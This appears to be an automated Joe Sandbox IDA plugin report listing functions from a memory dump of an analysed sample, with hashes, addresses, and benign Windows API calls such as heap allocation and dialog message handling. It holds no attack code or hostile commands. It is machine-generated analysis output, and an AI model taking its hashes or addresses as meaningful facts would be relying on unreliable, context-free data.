Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3d89a328b5cb00b243e4c7166652881781e46e6217859a83ef5f27c49a6f2252
Instruction ID: 2e6cf696c58aacabfc176badd3a6fe6fb0dff7a3c7160c6557a63f4e5c41ba9f
Opcode Fuzzy Hash: 3d89a328b5cb00b243e4c7166652881781e46e6217859a83ef5f27c49a6f2252
Instruction Fuzzy Hash: BF016230A15644DAC725F7A8C4557DDF7A4EF59700F80819DA95D932C3CBB41B09C663

Function 00828518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0082C13D,00000000,?,008267E2,?,00000008,?,008289AD,?,?,?), ref: 0082854A

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1af684703af6e0f07e8af29446c997eb91225fc36f2cceb95a6d0b84fa8f4310
Instruction ID: b06588df70b1d840d0a9efd770b38941dfcbe4e2b974f593bdf4e28d97d018cd
Opcode Fuzzy Hash: 1af684703af6e0f07e8af29446c997eb91225fc36f2cceb95a6d0b84fa8f4310
Instruction Fuzzy Hash: B4E0A021542535DAEF212B69BE04B5A3BC8FB413B0F150211A814E2082CF248CC085A6

Function 0080A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0080A4F5

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 8fa442d520e010fc2c9382dc86be7c63de5f1fc3848338a1315374a6d57315a5
Instruction ID: e65a0774b57ef89a2c0a0c30863dc41571208614e76b2e04132e7a8636bac121
Opcode Fuzzy Hash: 8fa442d520e010fc2c9382dc86be7c63de5f1fc3848338a1315374a6d57315a5
Instruction Fuzzy Hash: 49F0B435008780AACBB65BBC4C047D6BB90FF16361F04CA49F1FE821D1C27814859723

Function 0081067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 008106B1

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: c4f2b9ae6d307d5846134ed62e971f4168624fe0a3ca5f3948b3e3288d79a895
Instruction ID: 3a683406830eadb845c74dd27b2453bd51ab98c333b71618ad40fac2078d0305
Opcode Fuzzy Hash: c4f2b9ae6d307d5846134ed62e971f4168624fe0a3ca5f3948b3e3288d79a895
Instruction Fuzzy Hash: 74D0C22420421029CA65336CAC497FF1B0EFFC2710F180021B64DD36C79E9A08DA8AA3

Function 00819D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00819D81

Part of subcall function 00819B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00819B30

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 4ab27a7ba95e9f74af968ac49ace06d271f1c7c03112f8783e3197e4b34fd095
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: 10D0C77065820D7ADF41BB759C229FA7BADFF00350F104165FC48D6151EE71DE90A662

Function 00809989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00809887), ref: 00809995

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 8599151507c82df533226f238738a17d3e0788e2b9720dc69054cc2c16662170
Instruction ID: 724f2a092b7d9c9cf4f3c8a3d97ebfea939ed9903c0595aec39be6cabb863adc
Opcode Fuzzy Hash: 8599151507c82df533226f238738a17d3e0788e2b9720dc69054cc2c16662170
Instruction Fuzzy Hash: 46D01231111540A5CFA546394D090997F51FB83376B38CAA8D0A5C40E2D723C803F581

Function 0081D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0081D43F

Part of subcall function 0081AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0081AC85
Part of subcall function 0081AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0081AC96
Part of subcall function 0081AC74: IsDialogMessageW.USER32(00010450,?), ref: 0081ACAA
Part of subcall function 0081AC74: TranslateMessage.USER32(?), ref: 0081ACB8
Part of subcall function 0081AC74: DispatchMessageW.USER32(?), ref: 0081ACC2

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 23d2939630b1a11575192200c9f31471096c1fbad8057fd9417f05ae76f70fdb
Instruction ID: 01f9835444392904ccbaa614654e2e679f0dbed603173d6c3ff855944553e16c
Opcode Fuzzy Hash: 23d2939630b1a11575192200c9f31471096c1fbad8057fd9417f05ae76f70fdb
Instruction Fuzzy Hash: 13D09E31144300ABD6162B51CE06F0FBAA6FB89B04F004954B344B40F28662AD20EB16

Function 0081D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 534e801464dbda9d05f174e2163e7614bb9e4c72270a6a714aec915a4d7257d8
Instruction ID: a736957d42181ff7cb21305d6a0d28ba847d40f7cd5043a10c8e13df7a5ef6fc
Opcode Fuzzy Hash: 534e801464dbda9d05f174e2163e7614bb9e4c72270a6a714aec915a4d7257d8
Instruction Fuzzy Hash: 4DB012D526C7017D310C22446C52E7B020CFCC3B50331497AB20BE00C0D8406CCD4432

Function 0081D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5bf03f9a6b0b0e96997aed4c8e3ca710c8aa1e17b7a608efb4e18ff897a7ffad
Instruction ID: 482531f3ad9b884231b0264e69c801700461ec0f3381969d1629938f88cc2ffe
Opcode Fuzzy Hash: 5bf03f9a6b0b0e96997aed4c8e3ca710c8aa1e17b7a608efb4e18ff897a7ffad
Instruction Fuzzy Hash: 0EB012D526C7056C310C62486C42F7B020CFCC2B10330442AB20BD01C0D8406C890532

Function 0081D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 53ca328d59372d3f64516495c36ec41c456a0a61edb46be533cdf2fc396d77e1
Instruction ID: 38ae71d564975c7b8b198f0b15454ab4cdfce92ae12b1af59620ec90467aa712
Opcode Fuzzy Hash: 53ca328d59372d3f64516495c36ec41c456a0a61edb46be533cdf2fc396d77e1
Instruction Fuzzy Hash: A0B012D126C6016C310C624C6C02F76020CFCC3B10330C46AB60BE02C0D8406C8E0432

Function 0081D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ab5b52ec2be0e8babacdad79f157aabfe002e6df0cf38003a4bfe180a7d2cf8b
Instruction ID: 92f4ec55100f55105e51116d79b17338ac5e7d656c5fa432583bc97381bc8c7b
Opcode Fuzzy Hash: ab5b52ec2be0e8babacdad79f157aabfe002e6df0cf38003a4bfe180a7d2cf8b
Instruction Fuzzy Hash: 41B012D127C7016D314C624C6C02F76020CFCC2B50331856AB20BE02C0D8406CCE0432

Function 0081D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 974222dadc3a2583980458c8af6595c6900905cb0eddd1032b7971d23a696c11
Instruction ID: ac8056ae8bdbc4a0f7672b956f7a6419f86ae885e20a05142aeba0dc76d2ed35
Opcode Fuzzy Hash: 974222dadc3a2583980458c8af6595c6900905cb0eddd1032b7971d23a696c11
Instruction Fuzzy Hash: 3DB012D126C6016C310C624C6D02F76020CFCC2B10330846AB20BE02C0D8506D8F0432

Function 0081D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9188a7ed8175204dc42a88300c5b5668c692b6fa21bafcb4c96d9c31e0597cc0
Instruction ID: 0952b400c8daee3c38883abc98888866df87100d51fb3273f6f96507f3588413
Opcode Fuzzy Hash: 9188a7ed8175204dc42a88300c5b5668c692b6fa21bafcb4c96d9c31e0597cc0
Instruction Fuzzy Hash: 13B012E126C601AC310C62486C02F76020CFCC3B10330842AB60FD01C0D8406D8D0432

Function 0081D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7cd93bb28a4dd90d64819c1935701f5e9d32a8affe51bf36f1a1682541453821
Instruction ID: 22c003092a7af7df88ae89327d19aab07768b768f50b5e3307a4d1e455a6e2e3
Opcode Fuzzy Hash: 7cd93bb28a4dd90d64819c1935701f5e9d32a8affe51bf36f1a1682541453821
Instruction Fuzzy Hash: 1DB012E126C701AD314C62486C02F76020CFCC2B50331452AB20FD01C0D8406DC90472

Function 0081D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: de63d0368b2653d03e70a6c4a13e51b61736cd11492522a13f316586fdf2a5c1
Instruction ID: 74ae8dfc7e73b820b0d50ac71eb8d9150a680db787f51435f8707a38bfbe4644
Opcode Fuzzy Hash: de63d0368b2653d03e70a6c4a13e51b61736cd11492522a13f316586fdf2a5c1
Instruction Fuzzy Hash: 41B012E126C601AC310C62486D02F76020CFCC2B10330442AB20FD01C0D8406E8A0432

Function 0081D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 60c5ed684b803a648861192102bc5235b8b3d5c3cd183f95ed68ec1ac22c7a9e
Instruction ID: c23a5b6b12f07204cce945659daa386034cd7ba191fd15abbf8d1b5ad77a34e4
Opcode Fuzzy Hash: 60c5ed684b803a648861192102bc5235b8b3d5c3cd183f95ed68ec1ac22c7a9e
Instruction Fuzzy Hash: 03B012E126C601AC310C62496C02F76020CFCC2B10330442AB20FD01C0D8406D890432

Function 0081D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4d11d7102e975c99ddd22d6840cea483ab6e0e64a3999ab0cd73d9d8e1995ad2
Instruction ID: a3de8498fac3b5df57201e84dec3e8b06e7d7e64a8b389b7086f6a8a4ec3de64
Opcode Fuzzy Hash: 4d11d7102e975c99ddd22d6840cea483ab6e0e64a3999ab0cd73d9d8e1995ad2
Instruction Fuzzy Hash: C3B012D126D6016C310C62486C02F76020DFDC3B10730842AB60BD01C0D840AC890432

Function 0081D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081D8A3

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7db3c1a29a92961daa65d2246ec32bfbd4ec2e9fd0e5c734e7f701cb932c557d
Instruction ID: 2969f43b2187f2403b63774d968c45abba431237a16ef3c16d5458abb6d137c2
Opcode Fuzzy Hash: 7db3c1a29a92961daa65d2246ec32bfbd4ec2e9fd0e5c734e7f701cb932c557d
